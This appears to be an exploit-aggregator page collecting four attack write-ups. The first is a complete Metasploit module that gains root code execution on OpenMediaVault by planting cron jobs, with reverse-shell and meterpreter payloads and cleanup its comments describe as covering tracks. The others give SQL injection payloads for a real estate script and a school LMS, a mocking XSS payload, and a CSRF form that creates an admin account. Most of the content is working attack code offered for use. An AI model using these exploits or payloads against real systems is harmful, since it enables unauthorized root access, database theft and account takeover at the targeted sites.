Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::Deprecated moved_from 'exploit/multi/http/openmediavault_cmd_exec' def initialize(info = {}) super( update_info( info, 'Name' => 'OpenMediaVault rpc.php Authenticated Cron Remote Code Execution', 'Description' => %q{ OpenMediaVault allows an authenticated user to create cron jobs as root on the system. An attacker can abuse this by sending a POST request via rpc.php to schedule and execute a cron entry that runs arbitrary commands as root on the system. All OpenMediaVault versions including the latest release 7.4.2-2 are vulnerable. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Msf module contributor 'Brandon Perry <bperry.volatile[at]gmail.com>' # Original discovery and first msf module ], 'References' => [ ['CVE', '2013-3632'], ['PACKETSTORM', '178526'], ['URL', 'https://www.rapid7.com/blog/post/2013/10/30/seven-tricks-and-treats'], ['URL', 'https://attackerkb.com/topics/zl1kmXbAce/cve-2013-3632'] ], 'DisclosureDate' => '2013-10-30', 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64], 'Privileged' => true, 'Targets' => [ [ 'Unix Command', { 'Platform' => ['unix', 'linux'], 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ], [ 'Linux Dropper', { 'Platform' => ['linux'], 'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64], 'Type' => :linux_dropper, 'CmdStagerFlavor' => ['wget', 'curl'], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'WfsDelay' => 65 # wait at least one minute for session to allow cron to execute the payload }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options( [ OptString.new('TARGETURI', [true, 'The URI path of the OpenMediaVault web application', '/']), OptString.new('USERNAME', [true, 'The OpenMediaVault username to authenticate with', 'admin']), OptString.new('PASSWORD', [true, 'The OpenMediaVault password to authenticate with', 'openmediavault']), OptBool.new('PERSISTENT', [true, 'Keep the payload persistent in Cron. Default value is false, where the payload is removed', false]) ] ) end def user datastore['USERNAME'] end def pass datastore['PASSWORD'] end def rpc_success?(res) res&.code == 200 && res.body.include?('"error":null') end def login(user, pass) print_status("#{peer} - Authenticating with OpenMediaVault using credentials #{user}:#{pass}") # try the login options for all OpenMediaVault versions res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'rpc.php'), 'method' => 'POST', 'keep_cookies' => true, 'ctype' => 'application/json', 'data' => { service: 'Session', method: 'login', params: { username: user, password: pass }, options: nil }.to_json }) unless res&.code == 200 && res.body.include?('"authenticated":true') res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'rpc.php'), 'method' => 'POST', 'keep_cookies' => true, 'ctype' => 'application/json', 'data' => { service: 'Authentication', method: 'login', params: { username: user, password: pass } }.to_json }) end unless res&.code == 200 && res.body.include?('"authenticated":true') res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'rpc.php'), 'method' => 'POST', 'keep_cookies' => true, 'ctype' => 'application/json', 'data' => { service: 'Authentication', method: 'login', params: [ { username: user, password: pass } ] }.to_json }) return res&.code == 200 && res.body.include?('"authenticated":true') end true end def check_target print_status('Trying to detect if target is running a vulnerable version of OpenMediaVault.') res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'rpc.php'), 'method' => 'POST', 'keep_cookies' => true, 'ctype' => 'application/json', 'data' => { service: 'System', method: 'getInformation', params: nil }.to_json }) return nil unless rpc_success?(res) res end def check_version(res) # parse json response and get the version res_json = res.get_json_document unless res_json.blank? # OpenMediaVault v0.3 - v0.5 and up to v4 have different json formats where index 1 has the version information version = res_json.dig('response', 1, 'value') version = res_json.dig('response', 'version') if version.nil? version = res_json.dig('response', 'data', 1, 'value') if version.nil? return Rex::Version.new(version.split('(')[0].gsub(/[[:space:]]/, '')) unless version.nil? || version.split('(')[0].nil? end nil end def apply_config_changes # Apply OpenMediaVault configuration changes send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'rpc.php'), 'method' => 'POST', 'ctype' => 'application/json', 'keep_cookies' => true, 'data' => { service: 'Config', method: 'applyChangesBg', params: { modules: [], force: false }, options: nil }.to_json }) end def execute_command(cmd, _opts = {}) # OpenMediaFault current release - v6.0.15-1 uses an array definition ['*'] # OpenMediaVault v3.0.16 - v6.0.14-1 uses a string definition '*' # OpenMediaVault v1.0.22 - v3.0.15 uses a string definition '*' and uuid setting 'undefined' # OpenMediaVault v0.2.6.4 - v1.0.31 uses a string definition '*' and uuid setting 'undefined' and no execution parameter # OpenMediaVault < v0.2.6.4 uses a string definition '*' and uuid setting 'undefined', no execution parameter and no everyN parameters schedule = @version_number >= Rex::Version.new('6.0.15-1') ? ['*'] : '*' uuid = @version_number <= Rex::Version.new('3.0.15') ? 'undefined' : 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4' if @version_number > Rex::Version.new('1.0.32') post_data = { service: 'Cron', method: 'set', params: { uuid: uuid, enable: true, execution: 'exactly', minute: schedule, everynminute: false, hour: schedule, everynhour: false, dayofmonth: schedule, everyndayofmonth: false, month: schedule, dayofweek: schedule, username: 'root', command: cmd.to_s, # payload sendemail: false, comment: '', type: 'userdefined' }, options: nil }.to_json elsif @version_number >= Rex::Version.new('0.2.6.4') post_data = { service: 'Cron', method: 'set', params: { uuid: uuid, enable: true, minute: schedule, everynminute: false, hour: schedule, everynhour: false, dayofmonth: schedule, everyndayofmonth: false, month: schedule, dayofweek: schedule, username: 'root', command: cmd.to_s, # payload sendemail: false, comment: '', type: 'userdefined' } }.to_json else post_data = { service: 'Cron', method: 'set', params: [ { uuid: uuid, minute: schedule, hour: schedule, dayofmonth: schedule, month: schedule, dayofweek: schedule, username: 'root', command: cmd.to_s, # payload comment: '', type: 'userdefined' } ] }.to_json end res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'rpc.php'), 'method' => 'POST', 'ctype' => 'application/json', 'keep_cookies' => true, 'data' => post_data }) fail_with(Failure::Unknown, 'Cannot access cron services to schedule payload execution.') unless rpc_success?(res) # parse json response and get the uuid of the cron entry # we need this later to clean up and hide our tracks res_json = res.get_json_document @cron_uuid = res_json.dig('response', 'uuid') || '' # In early versions up to 0.4.x cron uuid does not get returned so try an extra query to get it if @cron_uuid.blank? if @version_number >= Rex::Version.new('0.2.6.4') method = 'getList' else method = 'getListByType' end post_data = { service: 'Cron', method: method, params: { start: 0, limit: -1, sortfield: nil, sortdir: nil, type: ['userdefined'] } }.to_json res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'rpc.php'), 'method' => 'POST', 'ctype' => 'application/json', 'keep_cookies' => true, 'data' => post_data }) res_json = res.get_json_document # get total list of entries and pick the last one index = res_json.dig('response', 'total') @cron_uuid = res_json.dig('response', 'data', index - 1, 'uuid') || '' end # Apply and update cron configuration to trigger payload execution (1 minute) # In early releases, you do not have to apply the changes, but the exact release change is unknown, so we always apply apply_config_changes print_status('Cron payload execution triggered. Wait at least 1 minute for the session to be established.') end def on_new_session(_session) # try to cleanup cron entry in OpenMediaVault unless PERSISTENT option is true unless datastore['PERSISTENT'] res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'rpc.php'), 'method' => 'POST', 'ctype' => 'application/json', 'keep_cookies' => true, 'data' => { service: 'Cron', method: 'delete', params: { uuid: @cron_uuid.to_s } # options: nil }.to_json }) if rpc_success?(res) # Apply changes and update cron configuration to remove the payload entry # In early releases, you do not have to apply the changes, but the exact release change is unknown, so we always apply apply_config_changes print_good('Cron payload entry successfully removed.') else print_warning('Cannot access the cron services to remove the payload entry. If required, remove the entry manually.') end end super end def check @logged_in = login(user, pass) return CheckCode::Unknown('Failed to authenticate at OpenMediaVault.') unless @logged_in res = check_target return CheckCode::Unknown('Can not identify target as OpenMediaVault.') if res.nil? @version_number = check_version(res) return CheckCode::Detected('Can not retrieve the version information.') if @version_number.nil? return CheckCode::Appears("Version #{@version_number}") if @version_number.between?(Rex::Version.new('0.1'), Rex::Version.new('7.4.2-2')) CheckCode::Detected("Version #{@version_number}") end def exploit unless @logged_in if login(user, pass) res = check_target fail_with(Failure::Unknown, 'Can not identify target as OpenMediaVault.') if res.nil? @version_number = check_version(res) if @version_number.nil? print_status('Can not retrieve version information. Continue anyway...') else print_status("Version #{@version_number} detected.") end else fail_with(Failure::NoAccess, 'Failed to authenticate at OpenMediaVault.') end end print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager end end end </code></pre>

<pre><code>[x]========================================================================================================================================[x] | Title : Readymade Real Estate Script Blind SQL & XSS Vulnerabilities | Software : Advanced Real Estate Script | Last Update : 12/07/24 | First Release: 25/01/22 | Vendor : http://www.i-netsolution.com/ | Date : 30 Agustus 2024 | Author : OoN_Boy [x]========================================================================================================================================[x] | Technology : PHP | Database : MySQL | Price : $100 | Description : The real estate market is full of interesting business opportunities. A few years back, it can be said that this industry is hardly responsive to innovation [x]========================================================================================================================================[x] [O] Exploit http://localhost/advance-realestate/search-results.php?Projectmain=&bedrooms=&maxprice=&proj_type=[SQL]&search=r00t&searchtext=&sell_price=111 http://localhost/advance-realestate/search-results.php?Projectmain=&bedrooms=&maxprice=&proj_type=[XSS]&search=r00t&searchtext=&sell_price=111 [O] Proof of concept [SQL] Parameter: proj_type (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) Payload: Projectmain=&proj_type=%' OR NOT 7852=7852#&searchtext=&sell_price=111&maxprice=&bedrooms=&search=r00t Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: Projectmain=&proj_type=%' AND GTID_SUBSET(CONCAT(0x7162706a71,(SELECT (ELT(7736=7736,1))),0x7178717871),7736) AND 'jCym%'='jCym&searchtext=&sell_price=111&maxprice=&bedrooms=&search=r00t Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: Projectmain=&proj_type=%' AND (SELECT 6632 FROM (SELECT(SLEEP(5)))NRLb) AND 'IbJm%'='IbJm&searchtext=&sell_price=111&maxprice=&bedrooms=&search=r00t [XSS] http://localhost/advance-realestate/advance-realestate/search-results.php?Projectmain=&bedrooms=&maxprice=&proj_type='"><img/src/onerror=.1|alert`HOMODETECTED!!!`+class=VrsHckHomo>&search=r00t&searchtext=&sell_price=111 [x]========================================================================================================================================[x] [O] Greetz BatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^ [x]========================================================================================================================================[x] </code></pre>

<pre><code>============================================================================================================================================= | # Title : Aero CMS v0.0.1 CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://codeload.github.com/MegaTKC/AeroCMS/zip/refs/heads/master | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] The following html code create a new admin . [+] Go to the line 9. [+] Set the target site link Save changes and apply . [+] infected file : admin/users.php?source=add_user [+] save code as poc.html . <form action="https://127.0.0.1/pepopecocom/admin/users.php?source=add_user" method="POST"> <div> <label for="username">Username:</label> <input type="text" id="username" name="username" required> </div> <div> <label for="password">Password:</label> <input type="password" id="password" name="password" required> </div> <div> <label for="user_email">Email:</label> <input type="email" id="user_email" name="user_email" required> </div> <div> <label for="user_first_name">First Name:</label> <input type="text" id="user_first_name" name="user_first_name" required> </div> <div> <label for="user_last_name">Last Name:</label> <input type="text" id="user_last_name" name="user_last_name" required> </div> <div> <label for="user_image">Profile Image:</label> <input type="file" id="user_image" name="user_image"> </div> <div> <label for="user_role">User Role:</label> <select id="user_role" name="user_role" required> <option value="admin">Admin</option> <option value="editor">Editor</option> <option value="subscriber">Subscriber</option> </select> </div> <div> <button type="submit" name="create_user">Create User</button> </div> </form> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>============================================================================================================================================= | # Title : SchoolPlus LMS v1.0 SQL injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : http://webpay.com.np/#Product | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : index.php?project_type_id=1 [+] https://www/127.0.0.1/demo/bccnorgnp/projects/index.php?project_type_id=1 <=== inject here [+] Parameter: project_type_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: project_type_id=1 AND 5604=5604 Type: stacked queries Title: MySQL < 5.0.12 stacked queries (BENCHMARK - comment) Payload: project_type_id=1;SELECT BENCHMARK(5000000,MD5(0x45507849))# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: project_type_id=1 AND (SELECT 5053 FROM (SELECT(SLEEP(5)))tLpS) Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: project_type_id=-7152 UNION ALL SELECT NULL,CONCAT(0x717a766271,0x6e496a5078736e466d5662454c5a6a73517278504b4d786866495454786d56417073505956586b70,0x71716a6a71)-- - --- Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>